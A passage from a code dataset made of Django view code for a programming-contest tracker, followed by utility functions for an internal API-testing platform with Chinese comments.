Calendar',\n ]:\n return HttpResponseBadRequest(\"invalid addtocalendar value\")\n coder.settings[\"add_to_calendar\"] = value\n coder.save()\n elif name == \"view-mode\":\n if value in [\"0\", \"1\"]:\n value = \"list\" if value == \"1\" else \"calendar\"\n if value not in [\"list\", \"calendar\", ]:\n return HttpResponseBadRequest(\"invalid view mode\")\n coder.settings[\"view_mode\"] = value\n coder.save()\n elif name in [\"hide-contest\", \"all-standings\", \"open-new-tab\", \"group-in-list\", \"calendar-filter-long\"]:\n if value not in [\"0\", \"1\", ]:\n return HttpResponseBadRequest(f\"invalid {name} value\")\n key = name.replace('-', '_')\n coder.settings[key] = int(value)\n coder.save()\n elif name == \"email\":\n if value not in (token.email for token in coder.token_set.all()):\n return HttpResponseBadRequest(\"invalid email\")\n user.email = value\n user.save()\n elif name == \"country\":\n coder.country = value\n coder.save()\n elif name == \"filter\":\n try:\n field = \"Filter id\"\n id_ = int(request.POST.get(\"value[id]\", -1))\n filter_ = Filter.objects.get(pk=id_, coder=coder)\n\n filter_.name = request.POST.get(\"value[name]\", \"\").strip().replace(\"'\", \"\") or None\n\n field = \"Duration\"\n duration_from = request.POST.get(\"value[duration][from]\", None)\n filter_.duration_from = int(duration_from) if duration_from and duration_from != \"NaN\" else None\n\n duration_to = request.POST.get(\"value[duration][to]\", None)\n filter_.duration_to = int(duration_to) if duration_to and duration_to != \"NaN\" else None\n\n if filter_.duration_from and filter_.duration_to and filter_.duration_from > filter_.duration_to:\n raise Exception(\"{from} should be less or equal {to}\")\n\n field = \"Regex\"\n regex = request.POST.get(\"value[regex]\", None)\n if regex:\n re.compile(regex)\n Contest.objects.filter(title__regex=regex).first()\n filter_.regex = regex if regex else None\n\n field = \"Inverse regex\"\n filter_.inverse_regex = request.POST.get(\"value[inverse_regex]\", \"false\") == \"true\"\n\n if filter_.inverse_regex and not filter_.regex:\n raise Exception(\"inverse set but regex is empty\")\n\n field = \"To show\"\n filter_.to_show = request.POST.get(\"value[to_show]\", \"false\") == \"true\"\n\n field = \"Resources\"\n filter_.resources = list(map(int, request.POST.getlist(\"value[resources][]\", [])))\n if Resource.objects.filter(pk__in=filter_.resources).count() != len(filter_.resources):\n raise Exception(\"invalid id\")\n\n field = \"Contest\"\n contest_id = request.POST.get(\"value[contest]\", None)\n if contest_id:\n filter_.contest = Contest.objects.get(pk=contest_id)\n else:\n filter_.contest = None\n\n field = \"Resources and contest\"\n if not filter_.resources and not filter_.contest:\n raise Exception(\"empty\")\n\n categories = coder.get_categories()\n field = \"Categories\"\n filter_.categories = request.POST.getlist(\"value[categories][]\", [])\n if not all([c in categories for c in filter_.categories]):\n raise Exception(\"invalid value(s)\")\n if len(filter_.categories) == 0:\n raise Exception(\"empty\")\n\n filter_.save()\n except Exception as e:\n return HttpResponseBadRequest(\"%s: %s\" % (field, e))\n elif name == \"add-filter\":\n if coder.filter_set.count() >= 50:\n return HttpResponseBadRequest(\"reached the limit number of filters\")\n filter_ = Filter.objects.create(coder=coder)\n return HttpResponse(json.dumps(filter_.dict()), content_type=\"application/json\")\n elif name == \"delete-filter\":\n try:\n id_ = int(request.POST.get(\"id\", 
-1))\n filter_ = Filter.objects.get(pk=id_, coder=coder)\n filter_.delete()\n except Exception as e:\n return HttpResponseBadRequest(e)\n elif name in (\"delete-notification\", \"reset-notification\", ):\n try:\n id_ = int(request.POST.get(\"id\", -1))\n n = Notification.objects.get(pk=id_, coder=coder)\n if name == \"delete-notification\":\n n.delete()\n elif name == \"reset-notification\":\n n.last_time = timezone.now()\n n.save()\n except Exception as e:\n return HttpResponseBadRequest(e)\n elif name == \"first-name\":\n if not value:\n return HttpResponseBadRequest(\"empty first name\")\n user.first_name = value\n user.save()\n elif name == \"last-name\":\n if not value:\n return HttpResponseBadRequest(\"empty last name\")\n user.last_name = value\n user.save()\n elif name == \"first-name-native\":\n if not value:\n return HttpResponseBadRequest(\"empty first name in native language\")\n coder.first_name_native = value\n coder.save()\n elif name == \"last-name-native\":\n if not value:\n return HttpResponseBadRequest(\"empty last name in native language\")\n coder.last_name_native = value\n coder.save()\n elif name == \"add-account\":\n if not value:\n return HttpResponseBadRequest(\"empty account value\")\n try:\n resource_id = int(request.POST.get(\"resource\"))\n resource = Resource.objects.get(pk=resource_id)\n account, created = Account.objects.get_or_create(resource=resource, key=value)\n if not created:\n if account.coders.filter(pk=coder.id).first():\n raise Exception('Account is already connect to this coder')\n if account.coders.count():\n module = Module.objects.filter(resource=resource).first()\n if not module or not module.multi_account_allowed:\n raise Exception('Account is already connect')\n account.coders.add(coder)\n account.save()\n return HttpResponse(json.dumps(account.dict()), content_type=\"application/json\")\n except Exception as e:\n return HttpResponseBadRequest(e)\n elif name == \"delete-account\":\n if not value:\n return HttpResponseBadRequest(\"empty account value\")\n try:\n host = request.POST.get(\"resource\")\n account = Account.objects.get(resource__host=host, key=value)\n account.coders.remove(coder)\n except Exception as e:\n return HttpResponseBadRequest(e)\n else:\n return HttpResponseBadRequest(\"unknown query\")\n\n return HttpResponse(\"accepted\")\n\n\n@login_required\ndef search(request, **kwargs):\n query = request.GET.get('query', None)\n if not query or not isinstance(query, str):\n return HttpResponseBadRequest('invalid query')\n\n count = int(request.GET.get('count', 10))\n page = int(request.GET.get('page', 1))\n if query == 'account':\n resource_id = int(request.GET.get('resource', -1))\n qs = Account.objects.filter(resource__id=resource_id)\n if 'user' in request.GET:\n user = request.GET.get('user')\n condition = Q()\n for pattern in user.split():\n pattern_re = verify_regex(pattern)\n condition = condition & (Q(key__iregex=pattern_re) | Q(name__iregex=pattern_re))\n qs = qs.filter(condition)\n\n total = qs.count()\n qs = qs[(page - 1) * count:page * count]\n ret = [\n {'id': a.key, 'text': f'{a.key} - {a.name}' if a.name and a.key.find(a.name) == -1 else a.key}\n for a in qs\n ]\n elif query == 'organization':\n qs = Organization.objects.all()\n\n name = request.GET.get('name')\n if name:\n qs = qs.filter(Q(name__icontains=name) | Q(name_ru__icontains=name) | Q(abbreviation__icontains=name))\n\n total = qs.count()\n qs = qs[(page - 1) * count:page * count]\n ret = [{'id': o.name, 'text': o.name} for o in qs]\n elif query == 
'team':\n qs = Team.objects.all()\n\n name = request.GET.get('name')\n if name:\n qs = qs.filter(name__icontains=name)\n\n event = kwargs.get('event')\n if event:\n qs = qs.filter(event=event)\n qs = qs.annotate(disabled=Case(\n When(status=TeamStatus.NEW, then=Value(False)),\n default=Value(True),\n output_field=BooleanField())\n ).order_by('disabled', '-modified')\n\n total = qs.count()\n qs = qs[(page - 1) * count:page * count]\n ret = [{'id': r.id, 'text': r.name, 'disabled': r.disabled} for r in qs]\n elif query == 'country':\n qs = list(countries)\n name = request.GET.get('name')\n if name:\n name = name.lower()\n qs = [(c, n) for c, n in countries if name in n.lower()]\n total = len(qs)\n qs = qs[(page - 1) * count:page * count]\n ret = [{'id': c, 'text': n} for c, n in qs]\n elif query == 'notpast':\n title = request.GET.get('title')\n qs = Contest.objects.filter(title__iregex=verify_regex(title), end_time__gte=timezone.now())\n total = qs.count()\n qs = qs[(page - 1) * count:page * count]\n ret = [{'id': c.id, 'text': c.title} for c in qs]\n elif query == 'field-to-select':\n text = request.GET.get('text')\n field = request.GET.get('field')\n assert '__' not in field\n field = f'addition__{field}'\n contest = get_object_or_404(Contest, pk=request.GET.get('cid'))\n qs = contest.statistics_set.filter(**{f'{field}__icontains': text}).distinct(field).values_list(field)\n\n total = qs.count()\n qs = qs[(page - 1) * count:page * count]\n ret = [{'id': f[0], 'text': f[0]} for f in qs]\n else:\n return HttpResponseBadRequest('invalid query')\n\n result = {\n 'items': ret,\n 'more': page * count <= total,\n }\n\n return HttpResponse(json.dumps(result, ensure_ascii=False), content_type=\"application/json\")\n\n\ndef get_api_key(request):\n if not request.user.is_authenticated:\n return HttpResponse('Unauthorized', status=401)\n if hasattr(request.user, 'api_key') and request.user.api_key is not None:\n api_key = request.user.api_key\n else:\n api_key = ApiKey.objects.create(user=request.user)\n return HttpResponse(api_key.key)\n\n\n@login_required\ndef party_action(request, secret_key, action):\n party = get_object_or_404(Party.objects.for_user(request.user), secret_key=secret_key)\n coder = request.user.coder\n if coder.party_set.filter(pk=party.id).exists():\n if action == 'join':\n messages.warning(request, 'You are already in %s.' % party.name)\n elif action == 'leave':\n coder.party_set.remove(party)\n messages.success(request, 'You leave party %s.' % party.name)\n else:\n if action == 'join':\n party.coders.add(coder)\n messages.success(request, 'You join to %s.' % party.name)\n elif action == 'leave':\n messages.warning(request, 'You are not there in %s.' 
% party.name)\n return HttpResponseRedirect(reverse('coder:party', args=[party.slug]))\n\n\ndef party(request, slug):\n party = get_object_or_404(Party.objects.for_user(request.user), slug=slug)\n\n has_statistics = Statistics.objects.filter(contest_id=OuterRef('pk'))\n party_contests = Contest.objects \\\n .filter(rating__party=party) \\\n .annotate(has_statistics=Exists(has_statistics)) \\\n .order_by('-end_time')\n\n coders = party.coders.filter(\n account__resource__contest__rating__party=party,\n account__resource__contest__statistics__account=F('account')\n ).annotate(\n n_participations=Count('account__resource')\n ).order_by(\n '-n_participations'\n ).select_related(\n 'user'\n )\n set_coders = set(coders)\n\n if request.user.is_authenticated:\n ignore_filters = request.user.coder.filter_set.filter(categories__contains=['calendar']).order_by('created')\n ignore_filters = list(ignore_filters.values('id', 'name'))\n else:\n ignore_filters = []\n ignore_filters.append({'id': 0, 'name': 'disable long'})\n\n results = []\n total = {}\n\n contests = Contest.objects.filter(rating__party=party)\n future = contests.filter(end_time__gt=timezone.now()).order_by('start_time')\n\n statistics = Statistics.objects.filter(\n account__coders__in=party.coders.all(),\n contest__in=party_contests.filter(start_time__lt=timezone.now()),\n ) \\\n .order_by('-contest__end_time') \\\n .select_related('contest', 'account') \\\n .prefetch_related('account__coders', 'account__coders__user')\n\n contests_standings = collections.OrderedDict(\n (c, []) for c in contests.filter(end_time__lt=timezone.now()).order_by('-end_time')\n )\n for statistic in statistics:\n contest = statistic.contest\n contests_standings.setdefault(contest, [])\n for coder in statistic.account.coders.all():\n if coder in set_coders:\n contests_standings[contest].append({\n 'solving': statistic.solving,\n 'upsolving': statistic.upsolving,\n 'stat': statistic,\n 'coder': coder,\n })\n\n for contest, standings in contests_standings.items():\n if standings:\n\n max_solving = max([s['solving'] for s in standings]) or 1\n max_total = max([s['solving'] + s['upsolving'] for s in standings]) or 1\n\n for s in standings:\n solving = s['solving']\n upsolving = s['upsolving']\n s['score'] = 4. * (solving + upsolving) / max_total + 1. * solving / max_solving\n s['interpretation'] = f'4 * ({solving} + {upsolving}) / {max_total} + {solving} / {max_solving}'\n\n max_score = max([s['score'] for s in standings]) or 1\n for s in standings:\n s['score'] = 100. 
* s['score'] / max_score\n s['interpretation'] = [f'100 * ({s[\"interpretation\"]}) / {max_score}']\n\n standings.sort(key=lambda s: s['score'], reverse=True)\n\n for s in standings:\n coder = s['coder']\n d = total.setdefault(coder.id, {})\n d['score'] = s['score'] + d.get('score', 0)\n d['coder'] = coder\n d['num'] = d.setdefault('num', 0) + 1\n d['avg'] = f\"{(d['score'] / d['num']):.2f}\"\n\n d, s = d.setdefault('stat', {}), s['stat']\n\n solved = s.addition.get('solved', {})\n d['solving'] = solved.get('solving', s.solving) + d.get('solving', 0)\n d['upsolving'] = solved.get('upsolving', s.upsolving) + d.get('upsolving', 0)\n\n results.append({\n 'contest': contest,\n 'standings': standings,\n })\n\n total = sorted(list(total.values()), key=lambda d: d['score'], reverse=True)\n results.insert(0, {\n 'standings': total,\n 'fields': [('Num', 'num', 'Number contests'), ('Avg', 'avg', 'Average score')],\n })\n\n for result in results:\n place = 0\n prev = None\n for i, s in enumerate(result['standings']):\n if prev != s['score']:\n prev = s['score']\n place = i + 1\n s['place'] = place\n\n return render(\n request,\n 'party.html',\n {\n 'ignore_filters': [],\n 'fixed_ignore_filters': ignore_filters,\n 'timezone': get_timezone(request),\n 'future': future,\n 'party': party,\n 'party_contests': party_contests,\n 'results': results,\n 'coders': coders,\n },\n )\n\n\ndef parties(request):\n parties = Party.objects.for_user(request.user).order_by('-created')\n parties = parties.prefetch_related('coders', 'rating_set')\n return render(request, 'parties.html', {'parties': parties})\n","sub_path":"true_coders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":21510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"342992346","text":"from django.http import JsonResponse, FileResponse\nfrom django.views.decorators.http import require_http_methods\nfrom django.forms.models import model_to_dict\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.conf import settings\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\nfrom django.db import connection, close_old_connections\nfrom api.extensions.custom_response import *\nfrom queue import Queue\nfrom api.models import *\nimport json\nimport time\nimport datetime\nimport os\nimport base64\n\n\n# @require_http_methods([\"GET\"])\ndef test(req):\n if req.user.is_superuser:\n print(\"是\")\n else:\n print(\"不是\")\n\ndef task_count():\n tasks = TestTask.m.filter()\n all_count = 0\n for task in tasks:\n count = len(str_to_list(task.case_ids))\n print(task.id, count)\n all_count += count\n\n print(all_count)\n return response_200()\n\n\n# 发送邮件调试\ndef test2(req):\n wwx = WorkWXApply(2)\n # response_400(data={\"a\":1}, raise_flag=True)\n if not wwx.msg:\n textcard = {\n \"description\": \"接口测试平台主页:\\nhttp://10.112.16.6/home\",\n \"title\": \"测试任务-测试报告\",\n \"btntxt\": \"查看详情\",\n \"url\": \"http://10.112.16.6/home\"\n }\n wwx.send_msg(\"guojing02\", textcard)\n if wwx.msg:\n return response_400(wwx.msg)\n else:\n return response_200()\n else:\n return response_400(wwx.msg)\n\n # item = {\n # \"body\": str(req.body),\n # \"GET\": dict(req.GET),\n # \"POST\": dict(req.POST),\n # \"user\": req.POST.get(\"user\", None)\n # }\n return response_200(item)\n\n\ndef get_now_time():\n return datetime.datetime.now()\n\n\ndef json_dumps(data):\n return json.dumps(data, ensure_ascii=False)\n\n\ndef json_dumps_indent4(data):\n 
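    # same as json_dumps above, but pretty-printed with indent=4 so nested structures stay readable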
return json.dumps(data, ensure_ascii=False, indent=4)\n\n\ndef page_handel(req, raw_data, model_to_dict_handle=True):\n item = {\n \"page\": None,\n \"page_size\": None,\n \"count\": len(raw_data),\n \"data\": [],\n }\n page = req.GET.get(\"page\", \"1\")\n page_size = req.GET.get(\"page_size\", \"10\")\n # page_size为-1表示要所有数据不分页\n if page_size == \"-1\":\n data = raw_data\n else:\n # page 如果只包含正整数并且不为0 则 int(), 否则为1\n page = int(page) if page.isdigit() and page != \"0\" else 1\n page_size = int(page_size) if page_size.isdigit() and page_size != \"0\" else 10\n\n data = raw_data[((page - 1) * page_size):((page - 1) * page_size) + page_size]\n\n item[\"page\"] = page\n item[\"page_size\"] = page_size\n\n if model_to_dict_handle:\n for i in data:\n item[\"data\"].append(model_to_dict(i))\n else:\n item[\"data\"] = data\n\n return item\n\n\ndef get_user_info_for_session(req, item=None, create=False):\n \"\"\"\n 从用户信息\n :param req:\n :param create: 是否为创建\n :param item: 如果传了item,会把用户信息user_info update到item中,\n :return: user_info\n \"\"\"\n try:\n user = str(req.session.get(\"user\"))\n user_id = req.session.get('_auth_user_id')\n # print(req.session)\n except Exception as e:\n response_400_raise_exception(\"获取用户名,用户id时出错:{}\".format(e))\n else:\n c_time = str(get_now_time())\n user_info = {\n \"latest_update_user\": user,\n \"latest_update_user_id\": user_id,\n \"u_date\": c_time,\n }\n if create:\n user_info[\"create_user\"] = user\n user_info[\"create_user_id\"] = user_id\n user_info[\"c_date\"] = c_time\n\n if item:\n item.update(user_info)\n\n return user_info\n\n\n@login_required\n@require_http_methods([\"POST\"])\ndef excel_json_auto_switch(req):\n sample_data_raw = req.POST.get(\"sample_data\", \"\")\n sample_data = None\n\n if not sample_data_raw:\n return response_400(\"样例数据为空!\")\n\n try:\n sample_data_json = json.loads(sample_data_raw)\n\n except:\n sample_data = sample_data_wsitch_json(sample_data_raw)\n\n else:\n if type(sample_data_json) == str:\n sample_data = sample_data_wsitch_json(sample_data_raw)\n elif type(sample_data_json) == list:\n sample_data = sample_data_wsitch_excel(sample_data_json)\n else:\n return response_400(\"样例数据格式有误,请检查修改!\")\n\n return response_200(sample_data=sample_data)\n\n\ndef sample_data_wsitch_excel(sample_data_json):\n lines = []\n if not sample_data_json:\n return \"\"\n try:\n headers = sample_data_json[0].keys()\n lines.append(\"\\t\".join(headers))\n\n for i in sample_data_json:\n item = []\n for h in headers:\n item.append(i[h])\n lines.append(\"\t\".join(item))\n\n sample_data_str = \"\\n\".join(lines)\n return sample_data_str\n\n except Exception as e:\n return response_400(\"样例数据格式有误,请检查修改!\")\n\n\ndef sample_data_wsitch_json(sample_data_raw):\n sample_data_json = []\n\n try:\n sample_data_list = [i.split(\"\\t\") for i in sample_data_raw.strip(\" \").split(\"\\n\") if i]\n\n row = len(sample_data_list[0])\n cos = len(sample_data_list)\n\n if cos == 1:\n response_400_raise_exception(\"测试样例数据有误1,请检查!(至少两行数据)\")\n\n for c in range(1, cos):\n sample_data_item = {}\n for r in range(row):\n sample_data_item[sample_data_list[0][r]] = sample_data_list[c][r]\n sample_data_json.append(sample_data_item)\n\n sample_data_json = json_dumps_indent4(sample_data_json)\n return sample_data_json\n\n except Exception as e:\n response_400_raise_exception(\"测试样例数据有误2,请检查!\\r\\n{}\".format(e))\n\n\n# 分割逗号\ndef str_to_list(strs, flag=\",\"):\n \"\"\"\n :param strs: 字符串\n :param flag: 分隔符\n :return: 字符串以分隔符分割,并且每个元素strip并且不要空的\n \"1,2 ,2 ,3, ,\" ==> ['1', '2', '2', 
'3']\n \"\"\"\n strs = strs or \"\"\n return [i.strip() for i in strs.strip().split(flag) if i.strip()]\n\n\n@require_http_methods([\"POST\"])\n# 只限params, kv格式转成json格式\ndef switch_json(req):\n param_keys = req.POST.getlist(\"param_key\", [])\n param_values = req.POST.getlist(\"param_value\", [])\n try:\n\n warning = []\n params = {}\n # 键值对格式转换成dict格式\n for i in range(len(param_keys)):\n if param_keys[i].strip():\n params[param_keys[i]] = param_values[i]\n else:\n warning.append(\"params名称为空的参数已被忽略!\")\n # print(params)\n\n warning = \",\".join(warning)\n return response_200(data=params, warning=warning)\n\n except Exception as e:\n return response_400(\"出错:{}\".format(e))\n\n\n@require_http_methods([\"POST\"])\ndef switch_kv(req):\n jp = req.POST.get(\"json_params\", \"\")\n try:\n data = json.loads(jp)\n return response_200(data=data)\n\n except:\n return response_400(\"json格式数据有错误或者为空!\")\n\n\n@require_http_methods([\"POST\"])\n# f12 粘贴的数据格式转换成json格式\ndef F12_p_to_json(req):\n params = req.POST.get(\"params\", \"\")\n\n try:\n dict_params = {i.split(\": \")[0]: i.split(\": \", 1)[-1] for i in params.split(\"\\n\") if i}\n data = json_dumps_indent4(dict_params)\n\n return response_200(data=data)\n\n except Exception as e:\n\n return response_400(\"出错:{}\".format(e))\n\n\n# 将从表单获取的kv形式的param和header转换成字典\ndef kv_switch_dict(k, v):\n \"\"\"\n k,v 皆为长度一样的列表,返回{k[i]:v[i]...}\n \"\"\"\n\n item = {}\n warning = []\n\n for i in range(len(k)):\n if k[i].strip():\n item[k[i]] = v[i]\n else:\n warning.append(\"名称为空的参数已被忽略!\")\n\n return {\n \"temp\": item,\n \"warning\": warning,\n }\n\n\n# 验证非空\ndef verify_not_is_None(item, fileds):\n \"\"\"\n :param item: 字典格式数据\n :param fileds: 要验证的字段\n :return: 如果是空的字段,返回字段名,\n 所有字段都不为空,返回None\n \"\"\"\n for i in fileds:\n if not item[i]:\n return i\n else:\n return None\n\n\n# 验证是否为json格式\ndef verify_is_json_and_switch(item, fileds, switch=True):\n \"\"\"\n :param item: 字典格式数据\n :param fileds: 字典里面要验证的字段\n :return: 是josn格式,返回None,否则返回错误信息\n \"\"\"\n for i in fileds:\n # 如果值不为None\n if item[i]:\n try:\n j = json.loads(item[i])\n if type(j) == str or type(j) == int:\n return \"{}必须为json格式,当前为字符串或数字格式!\".format(i)\n if switch:\n item[i] = j\n except:\n return \"{}必须为json格式\".format(i)\n else:\n if type(j) == str:\n return \"{}必须为json格式\".format(i)\n\n\n# 字典转换json\ndef dict_to_json(item, fileds):\n for i in fileds:\n if item[i]:\n item[i] = json_dumps(item[i])\n else:\n item[i] = \"\"\n\n\n@require_http_methods([\"POST\"])\n# 添加时间戳\ndef add_sign(req):\n \"\"\"\n 获取cookies值,转换成字典格式,将字典中sign的值赋为当前时间戳\n \"\"\"\n try:\n cookies = req.POST[\"cookies\"]\n if cookies:\n dict_cookies = json.loads(cookies)\n else:\n dict_cookies = {}\n\n timestamp = str(int(time.time() * 1000))\n dict_cookies['sign'] = timestamp\n\n data = json_dumps_indent4(dict_cookies)\n return response_200(data=data)\n\n except Exception as e:\n return response_400(\"错误:{}\".format(e))\n\n\n# 多线程\nclass Futures:\n\n def __init__(self, max_workers):\n self.executor = ThreadPoolExecutor(max_workers=max_workers) # 线程池,执行器\n self.tasks = [] # 线程集合\n\n def submit(self, func, arg, *args, **kwargs):\n task = self.executor.submit(func, arg, *args, **kwargs)\n self.tasks.append(task)\n return task\n\n def as_completed(self):\n \"\"\"\n :return: 阻塞主进程,直到所有线程完成任务\n \"\"\"\n for future in as_completed(self.tasks):\n # print(\"等待...{}\".format(len(self.tasks)))\n future.result()\n\n\n@require_http_methods([\"GET\"])\ndef download(req, file_path):\n file_path_real = os.path.join(settings.MEDIA_ROOT_VIRTUAL, 
file_path)\n if not os.path.exists(file_path_real):\n return response_404(\"文件不存在:{}!\".format(file_path))\n\n file = open(file_path_real, 'rb')\n response = FileResponse(file)\n response['Content-Type'] = 'application/octet-stream'\n # response['Content-Type'] = 'application/vnd.ms-excel' # 注意格式\n response['Content-Disposition'] = 'attachment;filename=\"{}\"'.format(file_path_real.rsplit(\"/\")[-1])\n\n return response\n\n\ndef customer_get_list(model, filter_item=None, order_by=None):\n \"\"\"\n :param model: 模型类对象\n :param filter_item: 字典\n :param order_by: 元祖,传入 () 时不排序\n :return:\n \"\"\"\n\n filter_item = filter_item or {}\n order_by = order_by or (\"title\", ) if order_by != -1 else ()\n datas = []\n\n try:\n infos = model.m.filter(**filter_item).order_by(*order_by)\n\n for i in infos:\n datas.append(model_to_dict_custom(i))\n\n except Exception as e:\n return response_400(\"错误信息:{}\".format(e))\n\n return response_200(data=datas)\n\n\ndef model_to_dict_custom(model):\n\n data = model_to_dict(model, exclude=[\"isDelete\", \"c_date\", \"u_date\"])\n data[\"c_date\"] = model.c_date.strftime('%Y-%m-%d %H:%M:%S')\n data[\"u_date\"] = model.u_date.strftime('%Y-%m-%d %H:%M:%S')\n\n return data\n\n\ndef api_ids_handle(item):\n \"\"\"\n :param item: 根据item中的project_id, group_ids,api_ids获取对应所有api_id\n 会在item中补充group_title_list,api_title_list字段\n :return: 返回 msg(错误信息)和api_id_list\n \"\"\"\n api_id_list = None\n\n def set_msg_and_return(msg=\"\"):\n if msg:\n item[\"msg\"] = msg\n item[\"isValid\"] = False\n # item[\"group_title_list\"] = json_dumps(['测试内容失效!:{}'.format(msg)])\n # item[\"api_title_list\"] = json_dumps(['测试内容失效!:{}'.format(msg)])\n item[\"group_title_list\"] = \"\"\n item[\"api_title_list\"] = \"\"\n return msg, api_id_list\n\n if not item[\"group_ids\"] and not item[\"api_ids\"]:\n return set_msg_and_return(\"未填写分组id或接口id!\")\n\n # 验证project_id\n if item[\"project_id\"]:\n try:\n pro_data = ApiProject.m.get(id=item[\"project_id\"])\n except:\n return set_msg_and_return(\"不存在的项目id:{}\".format(item[\"project_id\"]))\n else:\n item[\"project_title\"] = pro_data.title\n else:\n return set_msg_and_return(\"未填写项目id!\")\n\n # 获取group_id_list, group_title_list\n group_id_list = []\n group_title_list = []\n\n if item[\"group_ids\"] == \"all\":\n group_list = ApiGroup.m.filter(project=item[\"project_id\"])\n for i in group_list:\n group_id_list.append(i.id)\n group_title_list.append(i.title)\n else:\n # 判断所有group_id是否存在\n group_id_list = str_to_list(item[\"group_ids\"])\n for group_id in group_id_list:\n try:\n group_data = ApiGroup.m.get(id=int(group_id))\n except:\n return set_msg_and_return(\"不存在的分组id:{}\".format(group_id))\n else:\n group_title_list.append(\"分组:{} -- {}\".format(group_data.id, group_data.title))\n\n # 获取api_id_list, api_title_list\n api_id_list = str_to_list(item[\"api_ids\"])\n api_title_list = []\n # 判断所有api_id是否存在\n for api_id in api_id_list:\n try:\n api_data = ApiApi.m.get(id=int(api_id))\n except:\n return set_msg_and_return(\"不存在的接口id:{}\".format(api_id))\n else:\n api_title_list.append(\"接口:{} -- {}\".format(api_data.id, api_data.title))\n\n # 解析group下的所有api,放到api_id_list中\n for group_id in group_id_list:\n apis = ApiApi.m.filter(group=int(group_id))\n for api in apis:\n api_id_list.append(str(api.id))\n\n api_id_list = list(set(api_id_list)) # 去重,防止group下的api和api重复\n if not api_id_list:\n return set_msg_and_return(\"分组id与接口id 清洗后没有符合的数据!\")\n\n item[\"group_title_list\"] = json_dumps(group_title_list) if group_title_list else \"\"\n item[\"api_title_list\"] 
= json_dumps(api_title_list) if api_title_list else \"\"\n # return group_id_list, api_id_list\n return set_msg_and_return()\n\n\ndef case_ids_handle(item):\n def set_msg_and_return(msg=\"\"):\n if msg:\n item[\"msg\"] = msg\n item[\"isValid\"] = False\n # item[\"case_title_list\"] = json_dumps(['测试内容失效!:{}'.format(msg)])\n item[\"case_title_list\"] = \"\"\n return msg, case_id_list\n\n case_title_list = []\n case_id_list = str_to_list(item[\"case_ids\"])\n for case_id in case_id_list:\n try:\n case_data = ApiCase.m.get(id=int(case_id))\n case_title_list.append(\"用例:{} -- {}\".format(case_data.id, case_data.title))\n except:\n return set_msg_and_return(\"不存在的用例id:{}\".format(case_id))\n\n if not case_title_list:\n return set_msg_and_return(\"没有填写用例!\")\n\n item[\"case_title_list\"] = json_dumps(case_title_list) if case_title_list else \"\"\n return set_msg_and_return()\n\n\ndef get_all_projects(filter_item=None, **kwargs):\n if filter_item is None:\n filter_item = {}\n filter_item.update(kwargs)\n return ApiProject.m.filter(**filter_item).order_by(\"title\")\n\n\n# 每个项目 分组 接口 用例 统计 柱形图\ndef staticitem_project(req):\n # data = []\n project_title_list = []\n group_count_list = []\n api_count_list = []\n case_count_list = []\n\n cursor = connection.cursor()\n case_sql = \"SELECT api_id, count(*) FROM api_case WHERE isDelete=false group by api_id;\"\n cursor.execute(case_sql)\n cases = cursor.fetchall()\n\n projects = get_all_projects()\n for project in projects:\n project_title_list.append(project.title)\n groups = ApiGroup.m.filter(project_id=project.id)\n group_count = len(groups)\n api_count = 0\n case_count = 0\n for gourp in groups:\n apis = ApiApi.m.filter(group_id=gourp.id)\n api_count += len(apis)\n for api in apis:\n for case in cases:\n if case[0] == api.id:\n case_count += case[1]\n group_count_list.append(group_count)\n api_count_list.append(api_count)\n case_count_list.append(case_count)\n # data.append({project.title: [group_count, api_count, case_count]})\n # print(\"{}: 分组:{}个,接口{}个,用例{}个\\n\".format(\n # project.title, group_count, api_count, case_count))\n # print(\"总计{}个用例\".format(len(ApiCase.m.filter())))\n\n return response_200(\n project_title_list=project_title_list,\n group_count_list=group_count_list,\n api_count_list=api_count_list,\n case_count_list=case_count_list,\n all_count=len(ApiCase.m.filter()))\n\n\n# 项目下任务数量统计、任务中包含总用例数量统计\ndef staticitem_task(req):\n data = []\n projects = get_all_projects()\n for project in projects:\n task_count = TestTask.m.filter(project_id=project.id).count()\n data.append({\"name\": project.title, \"value\": task_count})\n\n tasks = TestTask.m.filter()\n case_count_for_task = 0\n for task in tasks:\n count = len(str_to_list(task.case_ids))\n case_count_for_task += count\n\n return response_200(data=data, task_count=TestTask.m.filter().count(),\n case_count_for_task=case_count_for_task)\n\n\n# 每个项目 最近100次、10次成功情况/最近七天成功失败次数\ndef staticitem_recent(req):\n # 最近七天成功失败次数\n project_id = req.GET.get(\"project_id\", \"\")\n filter_item = {}\n if project_id:\n filter_item[\"id\"] = project_id\n\n days = [] # 最近七天 datetime时间格式,需要str才能得到 2021-07-02\n today = datetime.date.today() # 获得今天的日期\n for i in range(7):\n day = today - datetime.timedelta(days=i)\n days.insert(0, day)\n\n colors = [\"#5470c6\", \"#91cc75\", \"#fac858\", \"#ee6666\",\n \"#73c0de\", \"#3ba272\", \"#fc8452\", \"#9a60b4\",\n \"#ea7ccc\", \"#f173ac\", \"#f05b72\",\n \"#fdb933\", \"#f26522\", \"#ef5b9c\"]\n colors_q = Queue()\n for color in colors:\n colors_q.put(color)\n\n 
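    # colors_q doles out one colour per series; the project loop below refills it
    # whenever it runs empty, so long project lists cycle through the palette again
    # (itertools.cycle would be an equivalent, arguably simpler, alternative)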
titles = []\n series = []\n cursor = connection.cursor()\n projects = get_all_projects(filter_item)\n username = str(req.session.get(\"user\"))\n for project in projects:\n if username not in str_to_list(project.users or \"\"):\n continue\n\n if colors_q.empty():\n for color in colors:\n colors_q.put(color)\n title_succeed = \"{} - 成功数量\".format(project.title)\n titles.append(title_succeed)\n title_fail = \"{} - 失败数量\".format(project.title)\n titles.append(title_fail)\n\n temp_succeed = {\n \"name\": title_succeed,\n \"type\": 'bar',\n \"stack\": project.title,\n \"emphasis\": {\n \"focus\": 'series'\n },\n \"data\": [],\n \"itemStyle\": {\n \"normal\": {\n \"label\": {\n \"show\": True,\n \"position\": 'middle',\n \"textStyle\": {\n \"color\": 'black',\n \"fontSize\": 24 if project_id else 12\n }\n },\n \"color\": \"#73c0de\" if project_id else colors_q.get()\n }\n }\n }\n temp_fail = {\n \"name\": title_fail,\n \"type\": 'bar',\n \"stack\": project.title,\n \"emphasis\": {\n \"focus\": 'series'\n },\n \"data\": [],\n \"itemStyle\": {\n \"normal\": {\n \"label\": {\n \"show\": True,\n \"position\": 'top',\n \"textStyle\": {\n \"color\": 'red',\n \"fontSize\": 24 if 